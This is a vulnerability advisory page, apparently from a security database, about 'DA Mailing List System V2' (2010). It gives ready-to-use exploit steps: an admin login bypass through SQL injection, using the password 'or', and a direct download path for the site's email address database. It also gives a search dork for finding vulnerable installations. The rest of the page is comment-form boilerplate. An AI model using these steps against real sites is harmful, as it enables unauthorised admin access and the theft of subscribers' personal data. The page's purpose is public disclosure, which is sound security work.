DA Mailing List 2 remote SQL injection and database disclosure

2010-02-09 / 2010-02-10
Credit: Phenom
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

####################################################################### # # ### DA Mailing List System V2 Remote Admin Login Exploit ### # # ####################################################################### # # # Author : Phenom # # # # Dork: DA Mailing List System V2 Powered by DigitalArakan.Net # # # # Version : 2 # # # ####################################################################### # # # Exploit : # # # # 1- http://server/path/admin_cp.asp # # # # 2- login with "admin" as user name and 'or' as password # # # ####################################################################### ####################################################################### # # ### DA Mailing List System V2 Download files vulnerability ### # # ####################################################################### # # # Author : Phenom # # # # Dork: DA Mailing List System V2 Powered by DigitalArakan.Net # # # # Version : 2 # # # ####################################################################### # # # # Exploit : # # # # # http://server/path/db/email_addresses.mdb # # # #######################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top